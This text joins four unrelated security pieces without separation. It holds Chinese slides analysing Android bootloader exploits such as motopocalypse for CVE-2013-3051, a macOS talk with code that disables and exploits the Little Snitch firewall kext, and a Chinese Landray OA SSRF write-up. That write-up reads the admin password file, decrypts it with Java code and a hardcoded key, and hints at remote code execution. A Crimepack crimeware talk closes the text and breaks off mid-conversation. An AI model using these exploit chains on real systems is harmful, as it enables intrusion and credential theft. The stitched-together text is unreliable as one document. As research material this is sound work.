未解锁漏洞攻击 1.google Nexus one 的bootloader 签名被绕过 2.Motorola Android系统 TrustZone内核安全漏 洞(CVE-2013-3051 ) 3.samsung-galaxy-s4 aboot 漏洞 这三个中我们只分析第二个,具体分析将在 后面漏洞分析中介绍 bootloader attack vector • 已解锁修改boot.img init.rc 启动文件 OldBoot 系列修改boot.img 的init.rc 添加 服务 service imei_chk /sbin/imei_chk class core socket imei_chk stream 666 bootloader attack vector • 已经解锁 bootloader rootkit 还未发现攻击,估计很快将会出现 bootloader attack vector • google Nexus one 的bootloader 签名被绕过 htc 手机有个安全属性s-on, s-off,当签名 检查通过后,就可以写系统目录,此时状态 是s-off, 当签名没有检查通过,就不能写系统 目录,此时状态就是s-on 由于Hboot 可以引导一个用户的kerenl, 而这个kernel 可以用来patch 签名的检查,从 而导致可以写系统目录。 bootloader 漏洞介绍 • google Nexus one 的bootloader 签名被绕过 工具:blackrose http://forum.xda- developers.com/showthread.php?t=1270 原理: http://hi.baidu.com/vessial/item/830e961 d2c2bea623e87ce47 bootloader 漏洞介绍 • samsung-galaxy-s4 aboot 漏洞 工具:https://github.com/Berrrry/loki 原理: http://blog.azimuthsecurity.com/2013/05/ exploiting-samsung-galaxy-s4-secure-boot.html bootloader 漏洞介绍 • Motorola Android系统 TrustZone内核安全漏洞 (CVE-2013-3051) 漏洞描述:使用Qualcomm MSM8960芯片的 Motorola Razr HD,Razr M,以及Atrix HD设备中 某Motorola定制版的Android 4.1.2系统TrustZone 内核中存在漏洞,该漏洞源于程序没有校验某物 理地址参数与内存区域之间的关联。通过使用内 核模式执行对特制0x9和0x2 SMC操作,本地攻击 者可利用该漏洞解锁引导装载程序(bootloader) bootloader 漏洞介绍 • Motorola Android系统 TrustZone内核安全漏 洞(CVE-2013-3051 ) Motorola 解锁需要token,命令为: fastboot oem unlock [token] 当有token后,motorola bootloader 里面有个 全局标记记录是否解锁,但是特殊的0x9和 0x2 SMC,会改写这个标志 bootloader 漏洞介绍 • Motorola Android系统 TrustZone内核安全漏 洞(CVE-2013-3051 ) 工具:motopocalypse http://vulnfactory.org/public/motopocalypse.zip 原理: http://blog.azimuthsecurity.com/2013/04/ unlocking-motorola-bootloader.html bootloader 漏洞介绍 • motopocalypse 中unlock 程序分析: 1.搜索全局标志 2.构造smc_command 命令参数,并映射到 内核地址0x80202000 3. hook unix_seqpacket_ops 中的ioctl 函 数,用payload 替换 bootloader 漏洞介绍 • motopocalypse 中unlock 程序分析: 4.触发payload 调用 socket(PF_LOCAL,SOCK_SEQPACKET, 0); ioctl(socket_fp, 0, 0) 5.payload 函数构造 bootloader 漏洞介绍 • 1.搜索全局标志,全局标志有返回错误- 1001,搜索value 0xfffffc17 (-1001) if (global_flag) ret = -1001; bootloader 漏洞介绍 • 2.构造smc_command 命令参数,并映射到内 存地址0x80202000(第一次构造smc 0x9) bootloader 漏洞介绍 • 2.smc_command 0x9 对应的bootloader处理 bootloader 漏洞介绍 • 2.构造smc_command 命令参数,并映内存地 址0x80202000(第二次构造) bootloader 漏洞介绍 • 2.smc_command 0x2 对应的bootloader处理 bootloader 漏洞介绍 • 3.hook unix_seqpacket_ops 中的ioctl 函 /proc/kallsyms中得到地址 hook unix_seqpacket_ops 调用触发我们的 payload bootloader 漏洞介绍 • 4.触发payload 调用 socket 调用最终触发了unix_create中的 case SOCK_SEQPACKET: sock->ops = &unix_seqpacket_ops; 由于hook 了 unix_seqpacket_ops 中的ioctl,调 用ioctl触发我们的hook 函数payload bootloader 漏洞介绍 • 5.payload 函数构造 bootloader 安全总结 • 1.bootloader 安全是一个信任链安全,任何 输入文件的信任,都必须对文件签名和校 验,Nexus one的漏洞是由于没有签名kernel 文件,导致已有的签名被绕过,Oldboot的 利用是没有签名boot.img • 2.解锁的bootloader 不能保证系统的安全性 • 3.对关键内核的函数地址隐藏关闭 kptr_restrict写权限,对内核结构进行写保 护 后续待研究 • bootloader rootkit • 主流android未解锁解锁bootloader 漏洞发掘 参考 • 8960 Boot Architecture • http://blog.azimuthsecurity.com • 如果绕过Nexus One的Bootloader的数字签名 by xee • Android系统典型bootloader分析 by 火翼 • http://forum.xda-developers.com/ 谢谢
@patrickwardle I got 99 Problems, but 
 Little Snitch ain’t one! WHOIS “leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints” @patrickwardle security for the 21st century career hobby making little snitch our b!tch OUTLINE understanding bypassing reversing owning UNDERSTANDING LITTLE SNITCH …a brief overview the de-facto host firewall for macOS LITTLE SNITCH "Little Snitch intercepts connection attempts, and lets you decide how to proceed." -www.obdev.at little snitch alert in the news (red team vs. palantir) the puzzle pieces LITTLE SNITCH COMPONENTS ring-0 ring-3 (root session) LittleSnitch.kext Little Snitch Daemon Little Snitch Configuration Little Snitch Agent › network, process monitoring 'authentication' › › rules management › rules management preferences › › ui alerts ring-3 (user/UI session) ring-0 bug BYPASSING LITTLE SNITCH undetected data exfil abusing system rules to talk to iCloud LITTLE SNITCH BYPASS 0X1 iCloud little snitch's iCloud rule o rly!?...yes! un-deletable system rule: "anybody can talk to iCloud" abusing 'proc-level' trust LITTLE SNITCH BYPASS 0X2 $/python/dylibHijackScanner.py// GPG/Keychain/is/vulnerable/(weak/rpath'd/dylib)/ 'weak/dylib':////'/Libmacgpg.framework/Versions/B/Libmacgpg'// 'LC_RPATH'://////'/Applications/GPG/Keychain.app/Contents/Frameworks' undetected exfil/C&C "Using Process Infection to Bypass Windows Software Firewalls" -Phrack, '04 gpg keychain; allow all dylib hijack 'injection' stop the network filter LITTLE SNITCH BYPASS 0X3 ring-0 method 0xB disable: 0x0 ring-3 LittleSnitch.kext //connect & authenticate to kext // ->see later slides for details :) //input // ->set to 0x0 to disable uint64_t input = 0x0; //stop network filter IOConnectCallScalarMethod(connectPort, 0xB, &input, 0x1, NULL, NULL); 'invisible' to UI //input // ->disable is 0x0 if( (0xB == method) && (0x0 == scalarInput) ) { //disable filter! } 'stop network filter' REVERSING LITTLE SNITCH poking on kext's interfaces /Library/Extensions/LittleSnitch.kext LITTLE SNITCH'S KEXT $/less/LittleSnitch.kext/Contents/Info.plist/ <?xml/version="1.0"/encoding="UTF-8"?>/ <plist/version="1.0">/ <dict>/ ///<key>CFBundleExecutable</key>/ ///<string>LittleSnitch</string>/ ///<key>CFBundleIdentifier</key>/ ///<string>at.obdev.nke.LittleSnitch</string>/ ///<key>CFBundlePackageType</key>/ ///<string>KEXT</string>/ ///<key>IOKitPersonalities</key>/ ///<dict>/ //////<key>ODLSNKE</key>/ //////<dict>/ /////////<key>CFBundleIdentifier</key>/ /////////<string>at.obdev.nke.LittleSnitch</string>/ /////////<key>IOClass</key>/ /////////<string>at_obdev_LSNKE</string>/ /////////<key>IOMatchCategory</key>/ /////////<string>at_obdev_LSNKE</string>/ /////////<key>IOProviderClass</key>/ /////////<string>IOResources</string>/ /////////<key>IOResourceMatch</key>/ /////////<string>IOBSD</string>/ //////</dict>/ ///</dict>/ .../ kext's Info.plist file i/o kit signing info XNU's device driver env I/O KIT self-contained, runtime environment implemented in C++ object-oriented › "Mac OS X and iOS Internals"
 "OS X and iOS Kernel Programming" 
 "IOKit Fundamentals" (apple.com) #include <IOKit/IOLib.h> #define super IOService OSDefineMetaClassAndStructors(com_osxkernel_driver_IOKitTest, IOService) bool com_osxkernel_driver_IOKitTest::init(OSDictionary* dict) { bool res = super::init(dict); IOLog("IOKitTest::init\n"); return res; } IOService* com_osxkernel_driver_IOKitTest::probe(IOService* provider, SInt32* score) { IOService *res = super::probe(provider, score); IOLog("IOKitTest::probe\n"); return res; } bool com_osxkernel_driver_IOKitTest::start (IOService *provider) { bool res = super::start(provider); IOLog("IOKitTest::start\n"); return res; } ... $/sudo/kextload/IOKitTest.kext/ $/grep/IOKitTest//var/log/system.log/ /users-Mac/kernel[0]:/IOKitTest::init/ /users-Mac/kernel[0]:/IOKitTest::probe/ /users-Mac/kernel[0]:/IOKitTest::start load kext; output i/o kit resources › › › sample i/o kit driver 'inter-ring' comms I/O KIT serial port driver open(/dev/xxx) read() / write() other i/o kit drivers find driver; then: I/O Kit Framework read/write 'properties' send control requests "The user-space API though which a process communicates with a kernel driver is provided by a framework known as 'IOKit.framework'" 
 -OS X and iOS Kernel Programming today's focus or invoking driver methods I/O KIT //look up method, invoke super externalMethod(selector, ...) ring-0 //check params, invoke method super::externalMethod(..., dispatch, ...) } selector (method index) › dispatch = methods[selector] dispatch (method) method_0(); method_1(); method_2(); ring-3 ex; driver interface I/O KIT const IOExternalMethodDispatch com_osxkernel_driver_IOKitTestUserClient::sMethods[kTestUserClientMethodCount] = { //kTestUserClientStartTimer(void); {sStartTimer, 0, 0, 0, 0}, //kTestUserClientDelayForTime(const TimerValue* timerValue); {sDelayForTime, 0, sizeof(TimerValue), 0, 0}, }; IOReturn com_osxkernel_driver_IOKitTestUserClient::externalMethod (uint32_t selector, IOExternalMethodArguments* arguments, IOExternalMethodDispatch* dispatch, OSObject* target, void* reference){ //ensure the requested control selector is within range if(selector >= kTestUserClientMethodCount) return kIOReturnUnsupported; dispatch = (IOExternalMethodDispatch*)&sMethods[selector]; target = this; reference = NULL; return super::externalMethod(selector, arguments, dispatch, target, reference); } struct IOExternalMethodDispatch { IOExternalMethodAction function; uint32_t checkScalarInputCount; uint32_t checkStructureInputSize; uint32_t checkScalarOutputCount; uint32_t checkStructureOutputSize; }; describes methods/args entry point, user-mode requests forward request to super, 
 which routes to method IOExternalMethodDispatch struct i/o kit driver interface ex; user 'client' I/O KIT mach_port_t masterPort = 0; io_service_t service = 0;
 //get master port IOMasterPort(MACH_PORT_NULL, &masterPort); //get matching service service = IOServiceGetMatchingService(masterPort, IOServiceMatching("com_osxkernel_driver_IOKitTest")); io_connect_t driverConnection = 0; //open connection IOServiceOpen(service, mach_task_self(), 0, &driverConnection); find driver open/create connection struct TimerValue { uint64_t time, uint64_t timebase; }; struct TimerValue timerValue = { .time=500, .timebase=0 }; //make request to driver
 IOConnectCallStructMethod(driverConnection, kTestUserClientDelayForTime, timerValue, sizeof(TimerValue), NULL, 0); kern_return_t IOConnectCallStructMethod( mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt ); send request IOKitLib.h IOConnectCallStructMethod function "OS X and iOS Kernel Programming" 
 (chapter 5) selector lea rcx, aDjd4e ; "DJD4E=" mov edx, 0AE4C415Dh ;string decoding omitted lea rsi, [rbp+symbol] mov rdi, 0FFFFFFFFFFFFFFFEh call _dlsym mov r10, rax mov cs:qword_10006E3C8, r10 test r10, r10 jz short loc_100025EAE lea rdi, [rbp+var_30] lea rdx, [rbp+var_2B8] lea rcx, [rbp+var_2D8] mov esi, 4 xor r8d, r8d xor r9d, r9d call r10 ; qword_10006E3C8 test eax, eax jnz short loc_100025EB7 lea rcx, aAec246 ; "AEC246" mov edx, 0AE4C415Dh strDecode: movzx esi, byte ptr [rax+rcx] add esi, 0Fh mov rdi, rsi imul rdi, rdx shr rdi, 26h imul edi, 5Eh sub esi, edi add esi, 20h mov [rbp+rax+symbol], sil inc rax cmp rax, 6 jnz short strDecode mov [rbp+var_2A], 0 lea rsi, [rbp+symbol] mov rdi, 0FFFFFFFFFFFFFFFEh call _dlsym mov r8, rax mov cs:qword_10006E068, r8 mov edi, 1Fh mov esi, 0FFFFFFFFh xor edx, edx xor ecx, ecx call r8 ; qword_10006E068 test eax, eax jz short continue gtfo reversers! #not LITTLE SNITCH ANTI-ANALYSIS #define PT_DENY_ATTACH 0x1F //decode 'ptrace' char* symbol = strDecode("AEC246", 0x0AE4C415D); //get address of ptrace() *(void **)(&fpPTRACE) = dlsym(handle, symbol); //invoke ptrace w/ 'PT_DENY_ATTACH' if(0 != fpPTRACE(PT_DENY_ATTACH, -1, 0, 0)) { //debugger detected // ->exit! } #define P_TRACED 0x00000800 //decode 'sysctl' char* symbol = strDecode("DJD4E=", 0x0AE4C415D); //get address of sysctl() *(void **)(&fpSYSCTL) = dlsym(handle, symbol); //invoke sysctl() to get current process info // ->mib: KERN_PROC, KERN_PROC_PID, and pid fpSYSCTL(mib, 4, &info, &size, NULL, 0); //check if process is being traced if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)) { //debugger detected // ->exit! } # ps aux | grep "Little Snitch" root 61 Little Snitch Daemon # lldb -p 61 (lldb) process attach --pid 61 error: attach failed: lost connection ptrace(PT_DENY_ATTACH) sysclt()/P_TRACED attach? nope! service: 'at_obdev_LSNKE' FIND/CONNECT TO LITTLE SNITCH'S KEXT char -[m097e1b4e m44e2ed6c](void * self, void * _cmd) { ... sub_10003579a(0x7789); } int sub_10003579a(int arg0) { r15 = arg0; rbx = IOMasterPort(0x0, 0x0);
 r14 = IOServiceGetMatchingService(0x0, IOServiceNameMatching("at_obdev_LSNKE")); r15 = IOServiceOpen(r14, *_mach_task_self_, r15, 0x10006ed58); mach_port_t masterPort = 0; io_service_t serviceObject = 0; io_connect_t connectPort = 0; IOMasterPort(MACH_PORT_NULL, &masterPort); serviceObject = IOServiceGetMatchingService(masterPort, IOServiceMatching("at_obdev_LSNKE")); IOServiceOpen(serviceObject, mach_task_self(), 0x7789, &connectPort); ls' daemon hopper decompilation $ ./connect2LS got master port: 0xb03 got matching service (at_obdev_LSNKE): 0xf03 opened service (0x7789): 0x1003 custom 'connection' code connected! 'reachable' kernel methods ENUMERATING AVAILABLE INTERFACES class_externalMethod proc push rbp mov rbp, rsp cmp esi, 16h ja short callSuper mov eax, esi lea rax, [rax+rax*2] lea rcx, IORegistryDescriptorC3::sMethods lea rcx, [rcx+rax*8] ... callSuper: mov rax, cs:IOUserClient_vTable pop rbp jmp qword ptr [rax+860h] IOKitTestUserClient::externalMethod(uint32_t selector, IOExternalMethodArguments* arguments, IOExternalMethodDispatch* dispatch, OSObject* target, void* reference) if(selector <= 16) dispatch = (IOExternalMethodDispatch*)&sMethods[selector]; return super::externalMethod(selector, arguments, dispatch, target, reference); IORegistryDescriptorC3_sMethods IOExternalMethodDispatch <0FFFFFF7FA13ED82Ah, 0, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED832h, 0, 0, 1, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED846h, 0, 0, 0, 83Ch> IOExternalMethodDispatch <0FFFFFF7FA13ED89Ah, 0, 0Ch, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED8D2h, 0, 0, 0, 10h> IOExternalMethodDispatch <0FFFFFF7FA13ED82Ah, 0, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED82Ah, 0, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED8FAh, 0, 20h, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED944h, 0, 10h, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED95Ah, 0, 0, 1, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED97Eh, 0, 0, 1, 0> IOExternalMethodDispatch <0FFFFFF7FA13ED9CEh, 1, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDA84h, 1, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDAC6h, 0, 0, 0, 10h> IOExternalMethodDispatch <0FFFFFF7FA13EDBBAh, 0, 0, 0, 10h> IOExternalMethodDispatch <0FFFFFF7FA13EDBCEh, 0, 0, 0, 80h> IOExternalMethodDispatch <0FFFFFF7FA13EDBFAh, 0, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDC0Eh, 1, 0, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDC22h, 0, 0Ch, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDC36h, 0, 10h, 0, 18h> IOExternalMethodDispatch <0FFFFFF7FA13EDC4Ah, 0, 0, 0, 2Ch> IOExternalMethodDispatch <0FFFFFF7FA13EDC86h, 0, 54h, 0, 0> IOExternalMethodDispatch <0FFFFFF7FA13EDCC2h, 1, 0, 0, 0> class methods ('sMethods') method #7 struct IOExternalMethodDispatch { IOExternalMethodAction function; uint32_t checkScalarInputCount; uint32_t checkStructureInputSize; uint32_t checkScalarOutputCount; uint32_t checkStructureOutputSize; }; IOExternalMethodDispatch struct pseudo code ls' externalMethod() IOUserClient.h it haz bug! SAY HELLO TO METHOD 0X7 IOExternalMethodDispatch 
 <0FFFFFF7FA13ED8FAh, 0, 20h, 0, 0> 0XFFFFFF7F86FED8FA method_0x7 proc ... mov rax, [rdi] ; this pointer, vTable mov rax, [rax+988h] ; method mov rsi, rdx jmp rax +0x0 __const:FFFFFF7FA13F5A30 vTable ... ... +0x988 __const:FFFFFF7FA13F63B8 dq offset sub_FFFFFF7FA13EABB2 0x63B8 - 0x5A30 = 0x988 sub_FFFFFF7FA13EABB2 proc mov rbx, rsi mov rdi, [rbx+30h] ; user-mode (ls) struct call sub_FFFFFF7FA13E76BC sub_FFFFFF7FA13E76BC proc near call sub_FFFFFF7FA13E76F7 sub_FFFFFF7FA13E76F7 proc near mov rbx, rdi ; user-mode struct mov rdi, [rbx+8] ; size test rdi, rdi jz short leave ; invalid size cmp qword ptr [rbx], 0 jz short leave mov rsi, cs:allocTag call _OSMalloc ; malloc ... mov rdi, [rbx] ; in buffer mov rdx, [rbx+8] ; size mov rsi, rax ; out buffer (just alloc'd) call _copyin struct lsStruct { void* buffer size_t size; ... }; sub_FFFFFF7FA13E76F7(struct lsStruct* ls) { if( (0 == ls->size) || (NULL == ls->buffer) ) goto bail; kBuffer = OSMalloc(ls->size, tag); if(NULL != kBuffer) copyin(ls->buffer, kBuffer, ls->size); method 0x7 'call thru' malloc/copy (pseudo-code) malloc/copy (IDA) 32bit size matters... KERNEL BUG? void* OSMalloc( uint32_t size, ...); libkern/libkern/OSMalloc.h int copyin(..., vm_size_t nbytes ); osfmk/x86_64/copyio.c offset 15 ... 8 7 6 5 4 3 2 1 0 value 1 0 0 0 0 0 0 0 2 64bit 64bit value: 0x100000002 32bit value: 0x100000002 struct lsStruct ls; ls.buffer = <some user addr>; ls.size = 0x100000002; //malloc & copy kBuffer = OSMalloc(0x00000002, tag); if(NULL != kBuffer) copyin(ls->buffer, kBuffer, 0x100000002); vs. kernel/heap heap/buffer/
 [size:/2/bytes] rest/of/heap.... heap/buffer/
 [size:/2/bytes] rest/of/heap.... 0x41 0x41 0x41/0x41/0x41/0x41/ 0x41/0x41/0x41/0x41 vm_size_t is 64bits! OWNING LITTLE SNITCH exploitation? gotta 'authenticate' ISSUE 0X1 IOExternalMethodDispatch <0FFFFFF7FA13ED8FAh, 0, 20h, 0, 0> method_0x7 proc cmp byte ptr [rdi+0E9h], 0 jz short leave ;buggy code IOExternalMethodDispatch <0FFFFFF7FA13ED944h, 0, 10h, 0, 0> method_0x8 proc MD5Update(var_90, r14 + 0xea, 0x10); MD5Update(var_90, 0x8E6A3FA34C4F4B23, 0x10); MD5Final(0x0FC5C35FAA776E256, var_90); do{ rdx = rcx; rcx = *(int8_t *)(rbp + rax + 0xffffffffffffff60); rcx = rcx ^ *(int8_t *)(rbx + rax); rcx = rcx & 0xff | rdx; rax = rax + 0x1; } while(rax != 0x10); if (rcx == 0x0) *(r14 + 0xe9) = 0x1; connect to Little Snitch driver ('at_obdev_LSNKE') invoke method 0x4 returns 0x10 'random' bytes hash this data, with embedded salt (\x56\xe2\x76\xa7...) invoke method 0x8 to with hash to authenticate unsigned char gSalt[] = "\x56\xe2\x76\xa7\xfa\x35\x5c\xfc \x23\x4b\x4f\x4c\xa3\x3f\x6a\x8e"; 0x0? leave :( sets flag :) authenticated; can (now) reach buggy code! the bug isn't exploitable!? ISSUE 0X2 kBuffer = OSMalloc(0x00000002, tag); copyin(ls->buffer, kBuffer, 0x100000002); heap/buffer/
 [size:/2/bytes] rest/of/heap.... 0x41 0x41 [/untouched/] only two bytes are copied!? _bcopy(const void *, void *, vm_size_t); /* * Copyin/out from user/kernel * rdi: source address * rsi: destination address * rdx: byte count */ Entry(_bcopy) // TODO: // think about 32 bit or 64 bit byte count movl %edx,%ecx shrl $3,%ecx x86_64/locore.s submit bug report to Apple (2013) Entry(_bcopy) xchgq %rdi, %rsi movl %rdx,%rcx shrl $3,%rcx fixed! (OS X 10.11, 2015) $EDX/$ECX byte count (not $RDX/$RCX) 32bit :( mapped page unmapped page copyin(ls->buffer, kBuffer, ls->size); controlling the heap copy ISSUE 0X3 heap buffer 
 [size: 2 bytes] rest of heap.... 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 panic :( Entry(_bcopy)
 RECOVERY_SECTION RECOVER(_bcopy_fail) rep movsq movl %edx, %ecx andl $7, %ecx RECOVERY_SECTION RECOVER(_bcopy_fail) _bcopy_fail: movl $(EFAULT),%eax ret 'fault toleranance' 0x100FFC 0x101000 struct lsStruct ls; ls.buffer = 0x100FFC ls.size = 0x100000002; heap buffer 
 [size: 2 bytes] rest of heap.... ring-0 ring-3 control exact # of bytes copied into buffer ls struct 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 ? ? ? vTable hijacking ($RIP) SUCCESS! heap buffer 
 [size: 2 bytes] C++ object [0xffffff8029a27e00] 0x41 0x41 0x4141414141414141 allocation size bytes copied # of bytes copied controls: + + attacker controlled vTable pointer (lldb)/x/4xg/0xffffff8029a27e00/ 0xffffff8029a27e00:/0x4141414141414141/0x4141414141414141/ 0xffffff8029a27e10:/0x4141414141414141/0x4141414141414141/ (lldb)/reg/read/$rax/ rax/=/0x4141414141414141/ (lldb)/x/i/$rip/ ->//0xffffff8020b99fb3:/ff/50/20//callq//*0x20(%rax) control of $RIP :) reliably exploiting a macOS heap overflow WEAPONIZING "Attacking the XNU Kernel in El Capitan" -luca todesco controlling heap layout
 bypassing kALSR bypassing smap/smep payloads (!SIP, etc) "Hacking from iOS 8 to iOS 9" 
 -team pangu "Shooting the OS X El Capitan Kernel Like a Sniper" -liang chen/qidan he } get root 'bring' & load buggy kext exploit & disable SIP SIP 'bypass' (buggy) kext still validly signed! CONCLUSIONS wrapping it up at least they fixed it... VENDOR RESPONSE :\ mov rbx, rdi ; user struct mov edi, [rbx+8] ; size call _OSMalloc mov rdi, [rbx] ; in buffer mov edx, [rbx+8] ; size mov rsi, rax ; out buffer call _copyin fixed the bug
 downplayed the bug didn't assign a CVE no credit (i'm ok with that) maybe talking about my exploit!? consistent size users won't patch free security tools & malware samples OBJECTIVE-SEE(.COM) KnockKnock BlockBlock TaskExplorer Ostiarius Hijack Scanner KextViewr RansomWhere? contact me any time :) QUESTIONS & ANSWERS patrick@synack.com @patrickwardle "Is it crazy how saying sentences backwards creates backwards sentences saying how crazy it is?" -Have_One, reddit.com final thought ;) mahalo :) CREDITS - FLATICON.COM - THEZOOOM.COM - ICONMONSTR.COM - HTTP://WIRDOU.COM/2012/02/04/IS-THAT-BAD-DOCTOR/ - HTTP://TH07.DEVIANTART.NET/FS70/PRE/F/ 2010/206/4/4/441488BCC359B59BE409CA02F863E843.JPG 
蓝凌OA前台SSRF漏洞 漏洞地址: /sys/ui/extend/varkind/custom.jsp 直接贴源码: <%@page import="com.landray.kmss.util.ResourceUtil"%> <%@page import="net.sf.json.JSONArray"%> <%@page import="net.sf.json.JSONObject"%> <%@ page language="java" pageEncoding="UTF-8"%> <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%> <% JSONObject vara = JSONObject.fromObject(request.getParameter("var")); JSONObject body = JSONObject.fromObject(vara.get("body")); %> <c:import url='<%=body.getString("file") %>'> <c:param name="var" value="${ param['var'] }"></c:param> </c:import> 挺简单的⼀处漏洞。。 内容就是⼀堆套娃处理。不细说。 问题就是在于 <c:import url= <c:import>标签提供了所有<jsp:include>⾏为标签所具有的功能,同时也允许 包含绝对URL。 举例来说,使⽤<c:import>标签可以包含⼀个FTP服务器中不同的⽹⻚内容。 url的内容可控为json内容中的file键值。 这⾥的url可以是相对路径和绝对路径或者是其他主机的资源。 简单来说就是⼀处ssrf。并且是有回显的。 看了⼤部分poc都是利⽤file协议去读取passwd。 你以为⽂章到这就结束了???这才刚刚开始。 既然是SSRF,并且可以读⽂件还⽀持相对路径?。这不好好利⽤⼀下? 如果你看过蓝凌OA的配置⽂档。你就知道,admin.do这个路径是管理系统配置。并 且,该地址的密码是以硬编码的格式保存在本地的。 路径: WEB-INF/KmssConfig/admin.properties 既然上⾯的ssrf⽀持相对路径和绝对路径。并且,是有回显的。那么只需要读取这 个路径的⽂件就可以了。 成功得到密码,但是这⾥要注意 kmss.properties.encrypt.enabled = true 如果为ture,则说明password的内容是加密过的。 那么就需要进⼀步解密。 先看看这个⽂件在哪⾥被读取了。 在 com.landray.kmss.sys.config.constant.SysConfigConstant 类 中, admin.properties 的路径被存储在变量 ADMIN_PROPERTIES_PATH 中。 继续查找,看⼀下哪⾥调⽤了 ADMIN_PROPERTIES_PATH 变量 最终在 com.landray.kmss.sys.config.action.SysConfigAdminUtil 中发现 getAdminProperties ⽅法中存在调⽤。 看了下具体逻辑。 if (isEncryptEnabled(p)) if (isEncryptEnabled(p)) p.setProperty("password", doPasswordDecrypt( p.getProperty("password"))); return p; } 如果配置⽂件中的加密选项为true。则进⼊ doPasswordDecrypt ⽅法进⾏解密。 这不就直接可以了吗? 解密代码: import com.landray.kmss.util.DESEncrypt; public class main { public static void main(String[] args) { String password = "mqwEyqHLj9PQXpy+yhf4z92SejWx+VeS"; String resul=doPasswordDecrypt(password); System.out.println(resul); } public static String doPasswordDecrypt(String password) { try { DESEncrypt des = new DESEncrypt("kmssAdminKey"); return des.decryptString(password); } catch (Exception ex) { try { DESEncrypt des0 = new DESEncrypt("kmssAdminKey", true); return des0.decryptString(password); } catch (Exception e) { return "hh"; } } } } 得到解密结果 直接访问admin.do进⾏登陆。 到了这⼀步。。。估计其他师傅已经知道怎么rce了。jndi,jdbc反序列化就可以直 接rce了 不过,对于我这种懒狗来说。还是不够简洁。 对于admin账号。可以直接在前台登陆。 然后利⽤hw期间爆出的后台洞就可以直接拿到shell。 这⾥摸⼀个0day,带⾛。
Anthony Lai Security Researcher@VXRL Taste the power of Crimeware! (HIT 2010 Edition) Special Thanks • HIT fellows • Thank you to PK and Birdman • My wife and Pomeranian family My Bio • From Hong Kong • Worked in penetration test, code audit and threat analysis • Interested in reverse engineering and malware analysis as well as programming  Story begins …> At 2300 Hack the crimeware Got a link • http://pastie.org/pastes/888690 from www.malwaredomainlist.com Its features From the pastie link, it includes the following features: • It is undetectable from anti-virus scanner • Obfuscate the PDF payload randomly • Checking whether the domain is on the blacklist • Prevent Wepatweb, Jsunpack and other Javascript unpackers to decode the page. • To guarantee high level of penetration and successful exploit, it could offer various exploits, which are shown below: – Adobe Acrobat Reader Exploits (including CVE-2010-0188) – JRE (GSB & SERIALIZE) – MDAC (IE) – MS09-032 (IE) – MS09-002 (IE) – CVE-2010-0806 (IE) Aha … I love the evil feeling  Mission 1: Try it out • Understand and get to know how it works • The only way is to grab a trial account Social Engineering • Add the contact in IM. • Wait for reply 2 days later… Replies and Conversation • 6.1 Conversation with Crimepack “key person” via IM on 15 April 2010 • 2:17:06 AM Buyer: Hi dude • 2:17:10 AM Buyer: I come from Hong Kong • 2:17:17 AM Buyer: I want to purchase the Crimepack. • 2:17:26 AM Buyer: how can I try it out? • 2:17:29 AM Buyer: what is the price/ • 2:17:39 AM Buyer: how to pay it? • 2:17:44 AM Buyer: and any discount for me, dude? • Changed status to Offline (2:18:53 AM) • Changed status to Online (2:18:54 AM) • 2:20:56 AM NEW VERSION 2.8.2 AVAILABLE NOW: what forum are u from? • 2:21:06 AM Buyer: fourm? • 2:21:09 AM Buyer: pastie.org • 2:23:15 AM NEW VERSION 2.8.2 AVAILABLE NOW: and where did you find the pastie link? • 2:23:40 AM Buyer: I have forgotten it for a while, dude, as I just search crimepack in Google. • 2:24:09 AM Buyer: crimeware • 2:26:07 AM NEW VERSION 2.8.2 AVAILABLE NOW: i see • 2:26:29 AM NEW VERSION 2.8.2 AVAILABLE NOW: price is 400$, and you can pay with WebMoney (WMZ) • 2:26:38 AM Buyer: 400 USD • 2:26:41 AM Buyer: right? • 2:26:43 AM NEW VERSION 2.8.2 AVAILABLE NOW: yes • 2:26:54 AM Buyer: May I have to try it for at least a few days? • 2:27:07 AM NEW VERSION 2.8.2 AVAILABLE NOW: yeah • 2:27:55 AM Buyer: thanks, • 2:28:09 AM Buyer: anything I need to obey or fulfill when I use the crimeware. • 2:30:11 AM NEW VERSION 2.8.2 AVAILABLE NOW: what do you mean_ • 2:30:24 AM Buyer: i mean terms and conditions of using the crimeware. • 2:31:31 AM NEW VERSION 2.8.2 AVAILABLE NOW: yeah terms of condition is don't share it, don't resell it and use it at your own risk • 2:31:56 AM Buyer: with full access of installation, configuration documentation • 2:32:17 AM Buyer: right? • 2:32:25 AM Buyer: okay, thanks, • 2:32:51 AM NEW VERSION 2.8.2 AVAILABLE NOW: you recieve the files, and a documentation how to install it yeah • 2:32:56 AM Buyer: okay • 2:33:07 AM Buyer: then may I be granted trial access right now? • 2:33:28 AM Buyer: as I will travel to Japan soon, may I have the access for 5 days? • 2:33:39 AM NEW VERSION 2.8.2 AVAILABLE NOW: yes • 2:33:41 AM Buyer: I would like to try it out within coming 5-7 days? • 2:33:51 AM Buyer: thanks, dude. • 2:34:11 AM NEW VERSION 2.8.2 AVAILABLE NOW: i can setup a trial for you in 1 hour • 2:34:22 AM Buyer: thank, mate • 2:34:30 AM Buyer: it seems the featue is good • 2:34:39 AM Buyer: may I enjoy any upgrade after purchase it? • 2:35:14 AM NEW VERSION 2.8.2 AVAILABLE NOW: pack improvements are usually free • 2:35:18 AM NEW VERSION 2.8.2 AVAILABLE NOW: first av cleaning is free • 2:35:20 AM Buyer: good. • 2:35:28 